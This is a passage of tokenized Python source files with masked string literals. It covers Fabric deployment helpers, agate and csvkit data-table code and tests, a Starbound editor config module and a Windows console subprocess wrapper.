append ( secret_conf ) <EOL> with hide ( * fab_output_hides ) : <EOL> return upload_template_changed ( <EOL> secrets_tpl , <EOL> '<STR_LIT>' , <EOL> context = { '<STR_LIT>' : secret_confs } , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_jinja = True <EOL> ) <EOL> def _configure_ipsec_site ( self , name , confs ) : <EOL> """<STR_LIT>""" <EOL> site_conf_tpl = '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT>' : name , <EOL> '<STR_LIT>' : env . aws_elastic_ip , <EOL> } <EOL> for key , value in confs . items ( ) : <EOL> context [ key ] = value <EOL> with hide ( * fab_output_hides ) : <EOL> return upload_template_changed ( <EOL> site_conf_tpl , <EOL> '<STR_LIT>' % name , <EOL> context = context , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> def _fix_pstat_logging_perms ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> def _enable_cron_tpl ( self , cron_file ) : <EOL> context = { <EOL> '<STR_LIT>' : os . path . join ( env . project_root , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : PYTHON_BIN , <EOL> '<STR_LIT>' : LOG_DIR , <EOL> } <EOL> cron_dst_base = '<STR_LIT>' <EOL> cron_tpl_path = os . path . join ( '<STR_LIT>' , cron_file ) <EOL> cron_dst_path = os . path . join ( cron_dst_base , cron_file ) <EOL> upload_template ( cron_tpl_path , cron_dst_path , context , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % cron_dst_path ) <EOL> def _configure_pstat_cron_jobs ( self ) : <EOL> if not env . get ( '<STR_LIT>' , False ) : <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> self . _enable_cron_tpl ( '<STR_LIT>' ) <EOL> def _configure_email_sending ( self ) : <EOL> if not env . get ( '<STR_LIT>' , False ) : <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> self . 
_enable_cron_tpl ( '<STR_LIT>' ) <EOL> COPY_DIRS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> EXCLUDES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def push_source ( <EOL> new_source_dir , current_source_dir = None , chown = None , chmod = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( u"<STR_LIT>" , env . host_string ) <EOL> sudo ( "<STR_LIT>" % new_source_dir ) <EOL> if current_source_dir : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> current_source_dir , <EOL> ) <EOL> for copy_dir in COPY_DIRS : <EOL> from_dir = os . path . join ( current_source_dir , copy_dir ) <EOL> to_dir = os . path . join ( new_source_dir , copy_dir ) <EOL> sudo ( "<STR_LIT>" % ( from_dir , to_dir ) ) <EOL> sudo ( '<STR_LIT>' % current_source_dir ) <EOL> sudo ( '<STR_LIT>' % current_source_dir ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" % ( env . user , new_source_dir ) ) <EOL> logger . info ( u"<STR_LIT>" ) <EOL> start = time . time ( ) <EOL> def do_rsync ( ) : <EOL> extra_opts = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> ] <EOL> return rsync_project ( <EOL> '<STR_LIT:%s>' % new_source_dir , <EOL> local_dir = '<STR_LIT>' , <EOL> exclude = EXCLUDES , <EOL> delete = True , <EOL> extra_opts = '<STR_LIT:U+0020>' . join ( extra_opts ) , <EOL> ) <EOL> output = do_rsync ( ) <EOL> if output . failed : <EOL> logger . warning ( <EOL> "<STR_LIT>" % output . return_code <EOL> ) <EOL> start = time . 
time ( ) <EOL> output = do_rsync ( ) <EOL> if output . failed : <EOL> logger . critical ( "<STR_LIT>" ) <EOL> exit ( <NUM_LIT:1> ) <EOL> logger . info ( "<STR_LIT>" , time . time ( ) - start ) <EOL> logger . info ( "<STR_LIT>" , output ) <EOL> if chown : <EOL> sudo ( "<STR_LIT>" % ( chown , new_source_dir ) ) <EOL> if chmod is not None : <EOL> if type ( chmod ) == int : <EOL> chmod = "<STR_LIT>" % chmod <EOL> sudo ( "<STR_LIT>" % ( chmod , new_source_dir ) ) <EOL> def push_ssl_crt ( ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( u"<STR_LIT>" ) <EOL> key = '<STR_LIT>' % env <EOL> crt = '<STR_LIT>' % env <EOL> bundle = '<STR_LIT>' % env <EOL> logger . info ( u"<STR_LIT>" % ( key , crt ) ) <EOL> put ( key , '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> put ( crt , '<STR_LIT>' ) <EOL> put ( bundle , '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def sudo_bg ( cmd , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> cmd_tpl = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> return sudo ( cmd_tpl % cmd , pty = False , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = __doc__ <EOL> __project_url__ = '<STR_LIT>' </s>
<s> from machine import UART <EOL> import machine <EOL> import os <EOL> uart = UART ( <NUM_LIT:0> , baudrate = <NUM_LIT> ) <EOL> os . dupterm ( uart ) <EOL> machine . main ( '<STR_LIT>' ) </s>
<s> from agate . aggregations . base import Aggregation <EOL> from agate . aggregations . has_nulls import HasNulls <EOL> from agate . aggregations . mean import Mean <EOL> from agate . data_types import Number <EOL> from agate . exceptions import DataTypeError <EOL> from agate . warns import warn_null_calculation <EOL> class Variance ( Aggregation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , column_name ) : <EOL> self . _column_name = column_name <EOL> self . _mean = Mean ( column_name ) <EOL> def get_aggregate_data_type ( self , table ) : <EOL> return Number ( ) <EOL> def validate ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> if not isinstance ( column . data_type , Number ) : <EOL> raise DataTypeError ( '<STR_LIT>' ) <EOL> has_nulls = HasNulls ( self . _column_name ) . run ( table ) <EOL> if has_nulls : <EOL> warn_null_calculation ( self , column ) <EOL> def run ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> data = column . values_without_nulls ( ) <EOL> mean = self . _mean . run ( table ) <EOL> return sum ( ( n - mean ) ** <NUM_LIT:2> for n in data ) / ( len ( data ) - <NUM_LIT:1> ) <EOL> class PopulationVariance ( Variance ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , column_name ) : <EOL> self . _column_name = column_name <EOL> self . _mean = Mean ( column_name ) <EOL> def get_aggregate_data_type ( self , table ) : <EOL> return Number ( ) <EOL> def validate ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> if not isinstance ( column . data_type , Number ) : <EOL> raise DataTypeError ( '<STR_LIT>' ) <EOL> has_nulls = HasNulls ( self . _column_name ) . run ( table ) <EOL> if has_nulls : <EOL> warn_null_calculation ( self , column ) <EOL> def run ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> data = column . values_without_nulls ( ) <EOL> mean = self . _mean . 
run ( table ) <EOL> return sum ( ( n - mean ) ** <NUM_LIT:2> for n in data ) / len ( data ) </s>
<s> from collections import OrderedDict <EOL> try : <EOL> from cdecimal import Decimal <EOL> except ImportError : <EOL> from decimal import Decimal <EOL> import six <EOL> from agate . data_types import Number <EOL> from agate . type_tester import TypeTester <EOL> from agate . rows import Row <EOL> from agate import utils <EOL> @ utils . allow_tableset_proxy <EOL> def denormalize ( self , key = None , property_column = '<STR_LIT>' , value_column = '<STR_LIT:value>' , default_value = utils . default , column_types = None ) : <EOL> """<STR_LIT>""" <EOL> from agate . table import Table <EOL> if key is None : <EOL> key = [ ] <EOL> elif not utils . issequence ( key ) : <EOL> key = [ key ] <EOL> field_names = [ ] <EOL> row_data = OrderedDict ( ) <EOL> for row in self . rows : <EOL> row_key = tuple ( row [ k ] for k in key ) <EOL> if row_key not in row_data : <EOL> row_data [ row_key ] = OrderedDict ( ) <EOL> f = six . text_type ( row [ property_column ] ) <EOL> v = row [ value_column ] <EOL> if f not in field_names : <EOL> field_names . append ( f ) <EOL> row_data [ row_key ] [ f ] = v <EOL> if default_value == utils . default : <EOL> if isinstance ( self . columns [ value_column ] . data_type , Number ) : <EOL> default_value = Decimal ( <NUM_LIT:0> ) <EOL> else : <EOL> default_value = None <EOL> new_column_names = key + field_names <EOL> new_rows = [ ] <EOL> row_names = [ ] <EOL> for k , v in row_data . items ( ) : <EOL> row = list ( k ) <EOL> if len ( k ) == <NUM_LIT:1> : <EOL> row_names . append ( k [ <NUM_LIT:0> ] ) <EOL> else : <EOL> row_names . append ( k ) <EOL> for f in field_names : <EOL> if f in v : <EOL> row . append ( v [ f ] ) <EOL> else : <EOL> row . append ( default_value ) <EOL> new_rows . append ( Row ( row , new_column_names ) ) <EOL> key_column_types = [ self . column_types [ self . column_names . 
index ( name ) ] for name in key ] <EOL> if column_types is None or isinstance ( column_types , TypeTester ) : <EOL> tester = TypeTester ( ) if column_types is None else column_types <EOL> force_update = dict ( zip ( key , key_column_types ) ) <EOL> force_update . update ( tester . _force ) <EOL> tester . _force = force_update <EOL> new_column_types = tester . run ( new_rows , new_column_names ) <EOL> else : <EOL> new_column_types = key_column_types + list ( column_types ) <EOL> return Table ( new_rows , new_column_names , new_column_types , row_names = row_names ) </s>
<s> from collections import OrderedDict <EOL> from decimal import Decimal <EOL> from glob import glob <EOL> import json <EOL> import os <EOL> import six <EOL> from agate . table import Table <EOL> @ classmethod <EOL> def from_json ( cls , path , column_names = None , column_types = None , keys = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from agate . tableset import TableSet <EOL> if isinstance ( path , six . string_types ) and not os . path . isdir ( path ) and not os . path . isfile ( path ) : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> tables = OrderedDict ( ) <EOL> if isinstance ( path , six . string_types ) and os . path . isdir ( path ) : <EOL> filepaths = glob ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> if keys is not None and len ( keys ) != len ( filepaths ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> for i , filepath in enumerate ( filepaths ) : <EOL> name = os . path . split ( filepath ) [ <NUM_LIT:1> ] . strip ( '<STR_LIT>' ) <EOL> if keys is not None : <EOL> tables [ name ] = Table . from_json ( filepath , keys [ i ] , column_types = column_types , ** kwargs ) <EOL> else : <EOL> tables [ name ] = Table . from_json ( filepath , column_types = column_types , ** kwargs ) <EOL> else : <EOL> if hasattr ( path , '<STR_LIT>' ) : <EOL> js = json . load ( path , object_pairs_hook = OrderedDict , parse_float = Decimal , ** kwargs ) <EOL> else : <EOL> with open ( path , '<STR_LIT:r>' ) as f : <EOL> js = json . load ( f , object_pairs_hook = OrderedDict , parse_float = Decimal , ** kwargs ) <EOL> for key , value in js . items ( ) : <EOL> tables [ key ] = Table . from_object ( value , column_types = column_types , ** kwargs ) <EOL> return TableSet ( tables . values ( ) , tables . keys ( ) ) </s>
<s> from agate import Table <EOL> from agate . data_types import * <EOL> from agate . type_tester import TypeTester <EOL> from agate . testcase import AgateTestCase <EOL> class TestDenormalize ( AgateTestCase ) : <EOL> def setUp ( self ) : <EOL> self . rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . text_type = Text ( ) <EOL> self . column_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' ] <EOL> self . column_types = [ self . text_type , self . text_type , self . text_type , self . text_type ] <EOL> def test_denormalize ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Text , Number ] ) <EOL> self . assertRowNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_denormalize_no_key ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( None , '<STR_LIT>' , '<STR_LIT:value>' ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Number ] ) <EOL> def test_denormalize_multiple_keys ( self ) : <EOL> table = Table ( self . 
rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:value>' ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Text , Text , Number ] ) <EOL> self . assertRowNames ( normalized_table , [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> def test_denormalize_default_value ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:value>' , default_value = '<STR_LIT:hello>' ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:hello>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:hello>' , '<STR_LIT>' ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Text , Text , Text ] ) <EOL> def test_denormalize_column_types ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( None , '<STR_LIT>' , '<STR_LIT:value>' , column_types = [ Text ( ) , Number ( ) ] ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . 
assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Number ] ) <EOL> def test_denormalize_column_type_tester ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( None , '<STR_LIT>' , '<STR_LIT:value>' , column_types = TypeTester ( force = { '<STR_LIT>' : Text ( ) } ) ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Number ] ) </s>
<s> import csv <EOL> import datetime <EOL> import itertools <EOL> import agate <EOL> import six <EOL> from csvkit import typeinference <EOL> from csvkit . cli import parse_column_identifiers , make_default_headers <EOL> POSSIBLE_DELIMITERS = [ '<STR_LIT:U+002C>' , '<STR_LIT:\t>' , '<STR_LIT:;>' , '<STR_LIT:U+0020>' , '<STR_LIT::>' , '<STR_LIT:|>' ] <EOL> def sniff_dialect ( sample ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> dialect = csv . Sniffer ( ) . sniff ( sample , POSSIBLE_DELIMITERS ) <EOL> except : <EOL> dialect = None <EOL> return dialect <EOL> class InvalidType ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Column ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , order , name , l , normal_type = InvalidType , blanks_as_nulls = True , infer_types = True ) : <EOL> """<STR_LIT>""" <EOL> if normal_type != InvalidType : <EOL> t = normal_type <EOL> data = l <EOL> elif not infer_types : <EOL> t = six . text_type <EOL> data = l <EOL> else : <EOL> t , data = typeinference . normalize_column_type ( l , blanks_as_nulls = blanks_as_nulls ) <EOL> list . __init__ ( self , data ) <EOL> self . order = order <EOL> self . name = name or '<STR_LIT>' <EOL> self . type = t <EOL> def __str__ ( self ) : <EOL> return str ( self . __unicode__ ( ) ) <EOL> def __unicode__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . order , self . name , self . type ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> l = len ( self ) <EOL> if isinstance ( key , slice ) : <EOL> indices = six . moves . range ( * key . indices ( l ) ) <EOL> return [ ( list . __getitem__ ( self , i ) if i < l else None ) for i in indices ] <EOL> if key >= l : <EOL> return None <EOL> return list . __getitem__ ( self , key ) <EOL> def has_nulls ( self ) : <EOL> """<STR_LIT>""" <EOL> return True if None in self else False <EOL> def max_length ( self ) : <EOL> """<STR_LIT>""" <EOL> l = <NUM_LIT:0> <EOL> if self . type == six . 
text_type : <EOL> l = max ( len ( d ) if d else <NUM_LIT:0> for d in self ) <EOL> if self . has_nulls ( ) : <EOL> l = max ( l , <NUM_LIT:4> ) <EOL> return l <EOL> class Table ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , columns = [ ] , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> list . __init__ ( self , columns ) <EOL> self . name = name <EOL> def headers ( self ) : <EOL> return [ c . name for c in self ] <EOL> def count_rows ( self ) : <EOL> lengths = [ len ( c ) for c in self ] <EOL> if lengths : <EOL> return max ( lengths ) <EOL> return <NUM_LIT:0> <EOL> @ classmethod <EOL> def from_csv ( cls , f , name = '<STR_LIT>' , sniff_limit = None , column_ids = None , blanks_as_nulls = True , column_offset = <NUM_LIT:1> , infer_types = True , no_header_row = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> contents = f . read ( ) <EOL> if sniff_limit is None : <EOL> kwargs [ '<STR_LIT>' ] = sniff_dialect ( contents ) <EOL> elif sniff_limit > <NUM_LIT:0> : <EOL> kwargs [ '<STR_LIT>' ] = sniff_dialect ( contents [ : sniff_limit ] ) <EOL> f = six . StringIO ( contents ) <EOL> rows = agate . csv . reader ( f , ** kwargs ) <EOL> try : <EOL> if no_header_row : <EOL> row = next ( rows ) <EOL> rows = itertools . chain ( [ row ] , rows ) <EOL> headers = make_default_headers ( len ( row ) ) <EOL> else : <EOL> headers = next ( rows ) <EOL> except StopIteration : <EOL> headers = [ ] <EOL> pass <EOL> if no_header_row or column_ids : <EOL> column_ids = parse_column_identifiers ( column_ids , headers , column_offset ) <EOL> headers = [ headers [ c ] for c in column_ids ] <EOL> else : <EOL> column_ids = range ( len ( headers ) ) <EOL> data_columns = [ [ ] for c in headers ] <EOL> width = len ( data_columns ) <EOL> for i , row in enumerate ( rows ) : <EOL> j = <NUM_LIT:0> <EOL> for j , d in enumerate ( row ) : <EOL> try : <EOL> data_columns [ j ] . append ( row [ column_ids [ j ] ] . 
strip ( ) ) <EOL> except IndexError : <EOL> break <EOL> j += <NUM_LIT:1> <EOL> while j < width : <EOL> data_columns [ j ] . append ( None ) <EOL> j += <NUM_LIT:1> <EOL> columns = [ ] <EOL> for i , c in enumerate ( data_columns ) : <EOL> columns . append ( Column ( column_ids [ i ] , headers [ i ] , c , blanks_as_nulls = blanks_as_nulls , infer_types = infer_types ) ) <EOL> return Table ( columns , name = name ) <EOL> def to_rows ( self , serialize_dates = False ) : <EOL> """<STR_LIT>""" <EOL> if serialize_dates : <EOL> out_columns = [ ] <EOL> for c in self : <EOL> if c . type in [ datetime . datetime , datetime . date , datetime . time ] : <EOL> out_columns . append ( [ six . text_type ( v . isoformat ( ) ) if v is not None else None for v in c ] ) <EOL> else : <EOL> out_columns . append ( c ) <EOL> return list ( zip ( * out_columns ) ) <EOL> else : <EOL> return list ( zip ( * self ) ) </s>
<s> from . i_naming_convention import INamingConvention <EOL> class NamingConventionUnderscore ( INamingConvention ) : <EOL> def getterName ( self , memberName ) : <EOL> return memberName <EOL> def setterName ( self , memberName ) : <EOL> return '<STR_LIT>' % memberName </s>
<s> """<STR_LIT>""" <EOL> import configparser <EOL> import os <EOL> import platform <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> config_folder = os . path . join ( os . path . expandvars ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> elif platform . system ( ) == "<STR_LIT>" : <EOL> config_folder = os . path . expanduser ( "<STR_LIT>" ) <EOL> else : <EOL> config_folder = os . path . expanduser ( "<STR_LIT>" ) <EOL> if not os . path . isdir ( config_folder ) : <EOL> os . mkdir ( config_folder ) <EOL> STARCHEAT_VERSION = "<STR_LIT>" <EOL> STARCHEAT_VERSION_TAG = "<STR_LIT>" <EOL> CONFIG_VERSION = <NUM_LIT:15> <EOL> ini_file = os . path . join ( config_folder , "<STR_LIT>" ) <EOL> class Config ( object ) : <EOL> def __init__ ( self ) : <EOL> self . config = configparser . ConfigParser ( ) <EOL> self . config_folder = config_folder <EOL> self . ini_file = ini_file <EOL> self . CONFIG_VERSION = CONFIG_VERSION <EOL> def read ( self , option ) : <EOL> self . config . read ( self . ini_file ) <EOL> return self . config [ "<STR_LIT>" ] [ option ] <EOL> def has_key ( self , option ) : <EOL> self . config . read ( self . ini_file ) <EOL> if "<STR_LIT>" in self . config : <EOL> return option in self . config [ "<STR_LIT>" ] <EOL> else : <EOL> return False <EOL> def set ( self , option , value ) : <EOL> self . config . read ( ini_file ) <EOL> self . config [ "<STR_LIT>" ] [ option ] = value <EOL> self . config . write ( open ( ini_file , "<STR_LIT:w>" ) ) <EOL> def create_config ( self , starbound_folder = None ) : <EOL> if starbound_folder is None : <EOL> starbound_folder = self . detect_starbound_folder ( ) <EOL> storage_folder = "<STR_LIT>" <EOL> assets_folder = os . path . join ( starbound_folder , "<STR_LIT>" ) <EOL> player_folder = os . path . join ( starbound_folder , storage_folder , "<STR_LIT>" ) <EOL> mods_folder = os . path . join ( starbound_folder , storage_folder , "<STR_LIT>" ) <EOL> backup_folder = os . path . 
join ( config_folder , "<STR_LIT>" ) <EOL> pak_hash = "<STR_LIT:none>" <EOL> check_updates = "<STR_LIT:yes>" <EOL> assets_db = os . path . join ( config_folder , "<STR_LIT>" ) <EOL> defaults = { <EOL> "<STR_LIT>" : starbound_folder , <EOL> "<STR_LIT>" : assets_folder , <EOL> "<STR_LIT>" : player_folder , <EOL> "<STR_LIT>" : mods_folder , <EOL> "<STR_LIT>" : backup_folder , <EOL> "<STR_LIT>" : pak_hash , <EOL> "<STR_LIT>" : assets_db , <EOL> "<STR_LIT>" : check_updates , <EOL> "<STR_LIT>" : CONFIG_VERSION <EOL> } <EOL> self . config [ "<STR_LIT>" ] = defaults <EOL> self . config . write ( open ( ini_file , "<STR_LIT:w>" ) ) <EOL> if not os . path . isdir ( backup_folder ) : <EOL> os . mkdir ( backup_folder ) <EOL> def remove_config ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . remove ( ini_file ) <EOL> except FileNotFoundError : <EOL> pass <EOL> def detect_starbound_folder ( self ) : <EOL> known_locations = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> os . path . expanduser ( "<STR_LIT>" ) , <EOL> os . path . expanduser ( "<STR_LIT>" ) , <EOL> os . path . expanduser ( "<STR_LIT>" ) <EOL> ] <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> import winreg <EOL> try : <EOL> key = "<STR_LIT>" <EOL> if platform . machine ( ) . endswith ( '<STR_LIT>' ) : <EOL> key = "<STR_LIT>" <EOL> starbound_uninstall = winreg . OpenKey ( winreg . HKEY_LOCAL_MACHINE , key ) <EOL> starbound_path = winreg . QueryValueEx ( starbound_uninstall , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> known_locations . append ( os . path . normpath ( starbound_path ) ) <EOL> starbound_uninstall . Close ( ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> steam = winreg . OpenKey ( winreg . HKEY_CURRENT_USER , "<STR_LIT>" ) <EOL> steam_path = os . path . normpath ( winreg . QueryValueEx ( steam , "<STR_LIT>" ) [ <NUM_LIT:0> ] ) <EOL> known_locations . append ( os . path . join ( steam_path , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> steam . 
Close ( ) <EOL> except OSError : <EOL> pass <EOL> for path in known_locations : <EOL> if os . path . isdir ( path ) and os . path . isfile ( os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> return path <EOL> return "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import re <EOL> import os <EOL> import ctypes <EOL> from conque_globals import * <EOL> from conque_win32_util import * <EOL> from conque_sole_shared_memory import * <EOL> class ConqueSoleSubprocess ( ) : <EOL> handle = None <EOL> pid = None <EOL> stdin = None <EOL> stdout = None <EOL> window_width = <NUM_LIT> <EOL> window_height = <NUM_LIT> <EOL> buffer_width = <NUM_LIT> <EOL> buffer_height = <NUM_LIT:100> <EOL> top = <NUM_LIT:0> <EOL> line_offset = <NUM_LIT:0> <EOL> output_blocks = <NUM_LIT:1> <EOL> cursor_line = <NUM_LIT:0> <EOL> cursor_col = <NUM_LIT:0> <EOL> data = [ ] <EOL> attributes = [ ] <EOL> attribute_cache = { } <EOL> default_attribute = <NUM_LIT:7> <EOL> shm_input = None <EOL> shm_output = None <EOL> shm_attributes = None <EOL> shm_stats = None <EOL> shm_command = None <EOL> shm_rescroll = None <EOL> shm_resize = None <EOL> is_alive = True <EOL> fast_mode = <NUM_LIT:0> <EOL> screen_redraw_ct = <NUM_LIT:0> <EOL> mem_redraw_ct = <NUM_LIT:0> <EOL> def open ( self , cmd , mem_key , options = { } ) : <EOL> """<STR_LIT>""" <EOL> self . reset = True <EOL> try : <EOL> try : <EOL> ctypes . windll . kernel32 . FreeConsole ( ) <EOL> except : <EOL> pass <EOL> self . buffer_height = CONQUE_SOLE_BUFFER_LENGTH <EOL> if '<STR_LIT>' in options and '<STR_LIT>' in options : <EOL> self . window_width = options [ '<STR_LIT>' ] <EOL> self . window_height = options [ '<STR_LIT>' ] <EOL> self . buffer_width = options [ '<STR_LIT>' ] <EOL> self . fast_mode = options [ '<STR_LIT>' ] <EOL> si = STARTUPINFO ( ) <EOL> si . dwFlags |= STARTF_USESHOWWINDOW <EOL> si . wShowWindow = SW_HIDE <EOL> flags = NORMAL_PRIORITY_CLASS | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE <EOL> pi = PROCESS_INFORMATION ( ) <EOL> res = ctypes . windll . kernel32 . CreateProcessW ( None , u ( cmd ) , None , None , <NUM_LIT:0> , flags , None , u ( '<STR_LIT:.>' ) , ctypes . byref ( si ) , ctypes . byref ( pi ) ) <EOL> self . 
